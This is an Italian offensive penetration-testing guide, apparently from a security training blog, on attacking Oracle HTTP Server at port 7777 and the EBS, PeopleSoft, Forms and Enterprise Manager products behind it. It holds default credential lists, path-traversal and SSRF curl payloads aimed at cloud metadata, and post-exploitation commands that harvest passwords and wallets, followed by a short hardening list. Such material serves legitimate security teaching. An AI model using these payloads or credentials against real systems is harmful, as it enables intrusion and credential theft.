Oracle EBS Pentest: Porta 7777, OHS e CVE 2026
Guida offensiva su Oracle HTTP Server porta 7777: enumerazione OHS, default credentials EBS e PeopleSoft, CVE-2022-21587, PL/SQL gateway injection, SSRF e lateral movement.
- Pubblicato il 2026-04-17
- Tempo di lettura: 4 min
La porta 7777 TCP è associata principalmente all’Oracle HTTP Server (OHS), il web server basato su Apache che fa da front-end per le applicazioni Oracle Fusion Middleware, E-Business Suite (EBS), PeopleSoft e altri prodotti enterprise Oracle. Se la conosci solo come “una porta qualsiasi”, stai sottovalutando quello che c’è dietro: un Oracle HTTP Server sulla 7777 è quasi sempre il gateway verso sistemi che gestiscono stipendi, fatturazione, supply chain, risorse umane e dati finanziari di grandi organizzazioni. Nel penetration testing, trovare la 7777 aperta significa aver trovato l’accesso al cuore gestionale dell’azienda — e i prodotti Oracle enterprise hanno una superficie di attacco enorme fatta di interfacce legacy, configurazioni di default e CVE che si accumulano anno dopo anno.
Al di fuori del mondo Oracle, la porta 7777 viene usata anche da servizi come COUCHDB (in configurazioni non standard), iChat (Apple), Backdoor Trojans storici (tNetServer, GodMessage) e vari servizi di sviluppo. Il primo passo è sempre identificare cosa risponde.
Identificare il Servizio #
nmap -sV -p 7777 10.10.10.40PORT STATE SERVICE VERSION
7777/tcp open http Oracle HTTP Server (OHS)# Banner grab
curl -s http://10.10.10.40:7777/ -I| Risposta | Servizio |
|---|---|
Server: Oracle-HTTP-Server | Oracle HTTP Server (OHS) |
Server: Oracle-Application-Server | Oracle Application Server |
| HTML con “E-Business Suite” o “Oracle Applications” | Oracle EBS |
| HTML con “PeopleSoft” | PeopleSoft |
Server: CouchDB | CouchDB (non standard, tratta come porta 5984) |
| Connessione rifiutata o binaria | Servizio proprietario o trojan |
1. Oracle HTTP Server (OHS) #
OHS è Apache con moduli Oracle (mod_wl_ohs per il proxy verso WebLogic, mod_plsql per il gateway PL/SQL). Funge da reverse proxy per le applicazioni Oracle dietro di lui.
Enumerazione #
# Versione e moduli
curl -s http://10.10.10.40:7777/server-status
curl -s http://10.10.10.40:7777/server-infoSe mod_status o mod_info sono attivi (capita più di quanto pensi), espongono: versione Apache e OHS, moduli caricati, connessioni attive con URL, virtual host configurati.
# Path Oracle comuni
curl -s http://10.10.10.40:7777/OA_HTML/ -I # E-Business Suite
curl -s http://10.10.10.40:7777/forms/frmservlet -I # Oracle Forms
curl -s http://10.10.10.40:7777/reports/ -I # Oracle Reports
curl -s http://10.10.10.40:7777/discoverer/ -I # Oracle Discoverer
curl -s http://10.10.10.40:7777/em/ -I # Enterprise Manager
curl -s http://10.10.10.40:7777/pls/apex/ -I # Oracle APEX
curl -s http://10.10.10.40:7777/pls/htmldb/ -I # APEX legacyOgni path che risponde 200 o 302 conferma un componente Oracle installato — ognuno con le sue vulnerabilità.
Directory bruteforce mirato #
gobuster dir -u http://10.10.10.40:7777 -w /usr/share/wordlists/dirb/common.txt -t 20# Wordlist specifica Oracle (path noti)
cat << 'EOF' > /tmp/oracle_paths.txt
/OA_HTML/
/OA_HTML/AppsLogin
/OA_HTML/RF.jsp
/OA_HTML/cabo/jsps/a.jsp
/forms/frmservlet
/reports/
/discoverer/
/em/
/pls/apex/
/pls/htmldb/
/pls/orasso/
/pls/dad/
/dms/
/dmsoc4j/
/j2ee/
/webcache/
/ohs/
EOF
gobuster dir -u http://10.10.10.40:7777 -w /tmp/oracle_paths.txt2. Oracle E-Business Suite (EBS) #
Se trovi /OA_HTML/ attivo, stai guardando un Oracle E-Business Suite — uno degli ERP enterprise più diffusi al mondo. Gestisce: contabilità, acquisti, HR, supply chain, CRM.
Enumerazione versione EBS #
# La pagina di login rivela spesso la versione
curl -s http://10.10.10.40:7777/OA_HTML/AppsLogin | grep -iE "version|release|R12|12\."# File di diagnostica (se accessibile)
curl -s http://10.10.10.40:7777/OA_HTML/cabo/jsps/a.jsp
curl -s http://10.10.10.40:7777/OA_HTML/jtflogin.jspDefault credentials EBS #
| Username | Password | Modulo |
|---|---|---|
sysadmin | sysadmin | Admin applicativo |
SYSADMIN | SYSADMIN | Variante uppercase |
guest | oracle | Accesso limitato |
operations | welcome | Account demo |
APPS | APPS | Schema database |
APPLSYS | FND | Schema sistema |
# Test sulla pagina di login
curl -s -X POST http://10.10.10.40:7777/OA_HTML/RF.jsp \
-d "ssousername=sysadmin&password=sysadmin"CVE Oracle EBS #
searchsploit oracle e-business
searchsploit oracle ebs
searchsploit oracle applicationsCVE rilevanti:
CVE-2022-21587 — Arbitrary file upload in Oracle Web Applications Desktop Integrator (CVSS 9.8, pre-auth):
# Verifica se il componente vulnerabile è presente
curl -s http://10.10.10.40:7777/OA_HTML/BnesApplicationService -ISe risponde → il componente è installato. Questa CVE è stata sfruttata attivamente in the wild.
CVE-2022-21529/CVE-2022-21500 — Information disclosure e SSRF in vari componenti EBS.
CVE-2019-2638 — RCE nel componente General Ledger.
# Nuclei per scan automatico
nuclei -u http://10.10.10.40:7777 -tags oraclePL/SQL Gateway Injection #
Il mod_plsql di OHS traduce URL in chiamate PL/SQL al database Oracle. Se mal configurato, puoi bypassare le restrizioni:
# Test PL/SQL injection
curl -s "http://10.10.10.40:7777/pls/dad/admin_/help/..%255cutil..%255c..%255c..%255c..%255cetc/passwd"# Accesso a procedure PL/SQL non protette
curl -s "http://10.10.10.40:7777/pls/dad/owa_util.showsource?cname=SYS.DBMS_OUTPUT"
curl -s "http://10.10.10.40:7777/pls/dad/owa_util.listprint"
curl -s "http://10.10.10.40:7777/pls/dad/htp.p?cbuf=test"Se owa_util è accessibile → puoi enumerare il database, eseguire query e potenzialmente ottenere RCE.
SSRF dal gateway Oracle #
# Il mod_plsql può essere usato per SSRF verso servizi interni
curl -s "http://10.10.10.40:7777/pls/dad/utl_http.request?url=http://169.254.169.254/latest/meta-data/"Se risponde → hai SSRF verso il metadata service cloud (AWS credential theft).
3. Oracle PeopleSoft #
Se trovi una pagina di login PeopleSoft:
curl -s http://10.10.10.40:7777/psp/ps/ -I
curl -s http://10.10.10.40:7777/psc/ps/ -IDefault credentials PeopleSoft #
| Username | Password | Note |
|---|---|---|
PS | PS | Account di sistema |
VP1 | VP1 | Test account |
PTDMO | PTDMO | Demo |
PeopleSoft deserialization #
PeopleSoft usa serializzazione Java nella comunicazione tra componenti. Le versioni non patchate sono vulnerabili a deserializzazione RCE:
# Tool: PeopleSoft_IDOR
python3 peoplesoft_exploit.py -u http://10.10.10.40:7777/psc/ps/4. Oracle Forms e Reports #
Oracle Forms #
curl -s http://10.10.10.40:7777/forms/frmservletOracle Forms è un’interfaccia client-server via web. Le versioni vecchie hanno:
- Path traversal per leggere file dal server
- Configurazione esposta in
formsweb.cfg
# File di configurazione Forms
curl -s http://10.10.10.40:7777/forms/java/oracle/forms/registry/default.dat
curl -s http://10.10.10.40:7777/forms/formsweb.cfgOracle Reports #
curl -s "http://10.10.10.40:7777/reports/rwservlet/showjobs"
curl -s "http://10.10.10.40:7777/reports/rwservlet/showenv"showenv espone variabili d’ambiente del server (credenziali, path, configurazione).
showjobs mostra i report in esecuzione e completati — possono contenere dati finanziari.
5. Oracle Enterprise Manager (porta 7777 o 7799) #
curl -s http://10.10.10.40:7777/em/Se presente, Enterprise Manager è la console di gestione di tutto l’ecosistema Oracle. Con credenziali admin → controllo su database, application server, middleware.
Default credentials: sysman:change_on_install, dbsnmp:dbsnmp.
6. Post-Exploitation #
Da OHS a WebLogic #
OHS fa da reverse proxy verso WebLogic. Se comprometti OHS:
# Configurazione del proxy — rivela WebLogic backend
cat /u01/oracle/ohs/conf/mod_wl_ohs.conf<Location /OA_HTML>
SetHandler weblogic-handler
WebLogicHost wl-internal-01.corp.internal
WebLogicPort 7001
</Location>Hostname e porta del WebLogic interno → attaccalo direttamente dalla rete.
Credenziali database #
# Connection string nei file di configurazione Oracle
grep -riE "jdbc|password|connect_string" /u01/oracle/ 2>/dev/null | head -30# tnsnames.ora — mappa dei database Oracle
cat $ORACLE_HOME/network/admin/tnsnames.ora
cat /u01/oracle/network/admin/tnsnames.oraPROD =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = db-prod.corp.internal)(PORT = 1521))
(CONNECT_DATA = (SID = ORCL))
)Hostname e SID del database Oracle di produzione.
File sensibili #
# Password file Oracle WebLogic (se OHS è sulla stessa macchina)
find / -name "boot.properties" 2>/dev/null
# Wallet Oracle (credenziali cifrate)
find / -name "cwallet.sso" -o -name "ewallet.p12" 2>/dev/null
# Password EBS
cat /u01/oracle/VIS/apps/apps_st/appl/fnd/12.0.0/secure/VIS_ebs.dbc7. Detection & Hardening #
- Disabilita
mod_statusemod_info—ServerTokens Prodin httpd.conf - Patch regolari — Oracle CPU (Critical Patch Update) ogni trimestre
- Non esporre su Internet — OHS dietro WAF e VPN
- Disabilita path non utilizzati — se non usi Forms, blocca
/forms/ - Restrizioni PL/SQL gateway —
PlsqlExclusionListper bloccare procedure pericolose - Credenziali forti per tutti gli account EBS/PeopleSoft
- Monitora accessi a
/OA_HTML/,/pls/,/forms/da IP non aziendali - Segmenta la rete — OHS in DMZ, WebLogic e database in rete interna
8. Cheat Sheet Finale #
| Azione | Comando |
|---|---|
| Nmap | nmap -sV -p 7777 target |
| Banner | curl -s http://target:7777/ -I |
| EBS login | curl -s http://target:7777/OA_HTML/AppsLogin |
| Forms | curl -s http://target:7777/forms/frmservlet |
| Reports env | curl -s http://target:7777/reports/rwservlet/showenv |
| APEX | curl -s http://target:7777/pls/apex/ |
| PL/SQL test | curl -s http://target:7777/pls/dad/owa_util.listprint |
| PeopleSoft | curl -s http://target:7777/psp/ps/ |
| Enterprise Mgr | curl -s http://target:7777/em/ |
| mod_status | curl -s http://target:7777/server-status |
| Gobuster | gobuster dir -u http://target:7777 -w oracle_paths.txt |
| Nuclei | nuclei -u http://target:7777 -tags oracle |
| Searchsploit | searchsploit oracle e-business peoplesoft |
Riferimento: Oracle Critical Patch Updates, OWASP Oracle testing, HackTricks Oracle. Uso esclusivo in ambienti autorizzati.
Oracle EBS, PeopleSoft, Fusion nella tua azienda? Il penetration test HackIta copre l’intero stack Oracle. Per chi vuole specializzarsi: percorso formativo 1:1.
